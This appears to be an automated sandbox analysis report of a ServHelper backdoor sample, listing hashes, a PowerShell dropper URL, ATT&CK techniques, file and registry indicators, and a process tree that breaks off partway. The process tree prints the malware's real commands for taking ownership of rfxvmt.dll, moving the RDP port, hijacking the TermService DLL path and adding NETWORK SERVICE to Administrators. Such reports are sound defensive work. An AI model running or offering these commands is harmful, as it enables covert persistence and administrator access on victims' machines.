servhelper | d541b9ff1fd68818abd9d0f70966e97beaab82dd6bb32d66566fbd6d657fbfd8

Analysis

max time kernel
163s
max time network
177s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
10-04-2024 14:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d541b9ff1fd68818abd9d0f70966e97beaab82dd6bb32d66566fbd6d657fbfd8.exe
Size

6.0MB
MD5

86178014e457120d9dc6f6e27453338c
SHA1

16ab38c0e9c4516532f9d111523e948a6311bfc0
SHA256

d541b9ff1fd68818abd9d0f70966e97beaab82dd6bb32d66566fbd6d657fbfd8
SHA512

746417e600a1a0cb157f6a74422140b1ed75767a7f47f208c46feadac1dcf845637ce986a11cd7ed3f07e9782ff736b8da448057b0eb65cc50df30baa500bf75
SSDEEP

49152:+G6we2P/3W01/65p9CepD70BIme1AWwYg015Y5vl5zytq9oB5JSZZSYu5q01ka2i:+32P/d/s

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 7 IoCs

Processes:

powershell.exe

flow	pid	process
60	1476	powershell.exe
62	1476	powershell.exe
66	1476	powershell.exe
68	1476	powershell.exe
70	1476	powershell.exe
74	1476	powershell.exe
76	1476	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exe

pid process

4540 icacls.exe
2004 icacls.exe
2728 icacls.exe
4860 icacls.exe
2024 icacls.exe
4088 takeown.exe
3328 icacls.exe
2596 icacls.exe

pid	process
4540	icacls.exe
2004	icacls.exe
2728	icacls.exe
4860	icacls.exe
2024	icacls.exe
4088	takeown.exe
3328	icacls.exe
2596	icacls.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

Processes:

pid process

1144
1144
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

2024 icacls.exe
4088 takeown.exe
3328 icacls.exe
2596 icacls.exe
4540 icacls.exe
2004 icacls.exe
2728 icacls.exe
4860 icacls.exe

pid	process
1144
1144

pid	process
2024	icacls.exe
4088	takeown.exe
3328	icacls.exe
2596	icacls.exe
4540	icacls.exe
2004	icacls.exe
2728	icacls.exe
4860	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\Branding\mediasrv.png	upx
C:\Windows\Branding\mediasvc.png	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

59 raw.githubusercontent.com
60 raw.githubusercontent.com
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

flow	ioc
59	raw.githubusercontent.com
60	raw.githubusercontent.com

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe

Drops file in Windows directory 18 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIE1BF.tmp	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_gvuv4ghx.2gl.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIE1AF.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIE13E.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIE16E.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIE19E.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_pqlzzskm.olp.ps1	powershell.exe

Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

2916 WMIC.exe

pid	process
2916	WMIC.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag,"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet"	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1184 reg.exe
Runs net.exe

pid	process
1184	reg.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	62	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	66	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1788	powershell.exe
1788	powershell.exe
1996	powershell.exe
1996	powershell.exe
1268	powershell.exe
1268	powershell.exe
4828	powershell.exe
4828	powershell.exe
1788	powershell.exe
1788	powershell.exe
1788	powershell.exe
1476	powershell.exe
1476	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

652
652

pid	process
652
652

Suspicious use of AdjustPrivilegeToken 19 IoCs

Processes:

d541b9ff1fd68818abd9d0f70966e97beaab82dd6bb32d66566fbd6d657fbfd8.exepowershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2736	d541b9ff1fd68818abd9d0f70966e97beaab82dd6bb32d66566fbd6d657fbfd8.exe
Token: SeDebugPrivilege	1788	powershell.exe
Token: SeDebugPrivilege	1996	powershell.exe
Token: SeDebugPrivilege	1268	powershell.exe
Token: SeDebugPrivilege	4828	powershell.exe
Token: SeRestorePrivilege	2596	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	2916	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2916	WMIC.exe
Token: SeAuditPrivilege	2916	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2916	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2916	WMIC.exe
Token: SeAuditPrivilege	2916	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2488	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2488	WMIC.exe
Token: SeAuditPrivilege	2488	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2488	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2488	WMIC.exe
Token: SeAuditPrivilege	2488	WMIC.exe
Token: SeDebugPrivilege	1476	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

d541b9ff1fd68818abd9d0f70966e97beaab82dd6bb32d66566fbd6d657fbfd8.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exe

description	pid	process	target process
PID 2736 wrote to memory of 1788	2736	d541b9ff1fd68818abd9d0f70966e97beaab82dd6bb32d66566fbd6d657fbfd8.exe	powershell.exe
PID 2736 wrote to memory of 1788	2736	d541b9ff1fd68818abd9d0f70966e97beaab82dd6bb32d66566fbd6d657fbfd8.exe	powershell.exe
PID 1788 wrote to memory of 1356	1788	powershell.exe	csc.exe
PID 1788 wrote to memory of 1356	1788	powershell.exe	csc.exe
PID 1356 wrote to memory of 3372	1356	csc.exe	cvtres.exe
PID 1356 wrote to memory of 3372	1356	csc.exe	cvtres.exe
PID 1788 wrote to memory of 1996	1788	powershell.exe	powershell.exe
PID 1788 wrote to memory of 1996	1788	powershell.exe	powershell.exe
PID 1788 wrote to memory of 1268	1788	powershell.exe	powershell.exe
PID 1788 wrote to memory of 1268	1788	powershell.exe	powershell.exe
PID 1788 wrote to memory of 4828	1788	powershell.exe	powershell.exe
PID 1788 wrote to memory of 4828	1788	powershell.exe	powershell.exe
PID 1788 wrote to memory of 4088	1788	powershell.exe	takeown.exe
PID 1788 wrote to memory of 4088	1788	powershell.exe	takeown.exe
PID 1788 wrote to memory of 3328	1788	powershell.exe	icacls.exe
PID 1788 wrote to memory of 3328	1788	powershell.exe	icacls.exe
PID 1788 wrote to memory of 2596	1788	powershell.exe	icacls.exe
PID 1788 wrote to memory of 2596	1788	powershell.exe	icacls.exe
PID 1788 wrote to memory of 4540	1788	powershell.exe	icacls.exe
PID 1788 wrote to memory of 4540	1788	powershell.exe	icacls.exe
PID 1788 wrote to memory of 2004	1788	powershell.exe	icacls.exe
PID 1788 wrote to memory of 2004	1788	powershell.exe	icacls.exe
PID 1788 wrote to memory of 2728	1788	powershell.exe	icacls.exe
PID 1788 wrote to memory of 2728	1788	powershell.exe	icacls.exe
PID 1788 wrote to memory of 4860	1788	powershell.exe	icacls.exe
PID 1788 wrote to memory of 4860	1788	powershell.exe	icacls.exe
PID 1788 wrote to memory of 2024	1788	powershell.exe	icacls.exe
PID 1788 wrote to memory of 2024	1788	powershell.exe	icacls.exe
PID 1788 wrote to memory of 3080	1788	powershell.exe	reg.exe
PID 1788 wrote to memory of 3080	1788	powershell.exe	reg.exe
PID 1788 wrote to memory of 1184	1788	powershell.exe	reg.exe
PID 1788 wrote to memory of 1184	1788	powershell.exe	reg.exe
PID 1788 wrote to memory of 4464	1788	powershell.exe	reg.exe
PID 1788 wrote to memory of 4464	1788	powershell.exe	reg.exe
PID 1788 wrote to memory of 2240	1788	powershell.exe	net.exe
PID 1788 wrote to memory of 2240	1788	powershell.exe	net.exe
PID 2240 wrote to memory of 2216	2240	net.exe	net1.exe
PID 2240 wrote to memory of 2216	2240	net.exe	net1.exe
PID 1788 wrote to memory of 1084	1788	powershell.exe	cmd.exe
PID 1788 wrote to memory of 1084	1788	powershell.exe	cmd.exe
PID 1084 wrote to memory of 2384	1084	cmd.exe	cmd.exe
PID 1084 wrote to memory of 2384	1084	cmd.exe	cmd.exe
PID 2384 wrote to memory of 1504	2384	cmd.exe	net.exe
PID 2384 wrote to memory of 1504	2384	cmd.exe	net.exe
PID 1504 wrote to memory of 532	1504	net.exe	net1.exe
PID 1504 wrote to memory of 532	1504	net.exe	net1.exe
PID 1788 wrote to memory of 3364	1788	powershell.exe	cmd.exe
PID 1788 wrote to memory of 3364	1788	powershell.exe	cmd.exe
PID 3364 wrote to memory of 1580	3364	cmd.exe	cmd.exe
PID 3364 wrote to memory of 1580	3364	cmd.exe	cmd.exe
PID 1580 wrote to memory of 508	1580	cmd.exe	net.exe
PID 1580 wrote to memory of 508	1580	cmd.exe	net.exe
PID 508 wrote to memory of 1840	508	net.exe	net1.exe
PID 508 wrote to memory of 1840	508	net.exe	net1.exe
PID 2512 wrote to memory of 4332	2512	cmd.exe	net.exe
PID 2512 wrote to memory of 4332	2512	cmd.exe	net.exe
PID 4332 wrote to memory of 260	4332	net.exe	net1.exe
PID 4332 wrote to memory of 260	4332	net.exe	net1.exe
PID 4792 wrote to memory of 1428	4792	cmd.exe	net.exe
PID 4792 wrote to memory of 1428	4792	cmd.exe	net.exe
PID 1428 wrote to memory of 2124	1428	net.exe	net1.exe
PID 1428 wrote to memory of 2124	1428	net.exe	net1.exe
PID 920 wrote to memory of 4872	920	cmd.exe	net.exe
PID 920 wrote to memory of 4872	920	cmd.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\d541b9ff1fd68818abd9d0f70966e97beaab82dd6bb32d66566fbd6d657fbfd8.exe
"C:\Users\Admin\AppData\Local\Temp\d541b9ff1fd68818abd9d0f70966e97beaab82dd6bb32d66566fbd6d657fbfd8.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2736
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1788
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bq2bw3pc\bq2bw3pc.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1356
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1EAE.tmp" "c:\Users\Admin\AppData\Local\Temp\bq2bw3pc\CSC5AD5ECE52A2F4DC2911258C2A78DB4CF.TMP"
      4⤵
      PID:3372
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1996
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1268
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4828
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4088
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3328
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2596
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4540
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2004
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2728
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4860
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2024
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:3080
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Sets DLL path for service in the registry
    - Modifies registry key
    PID:1184
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:4464
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2240
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:2216
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
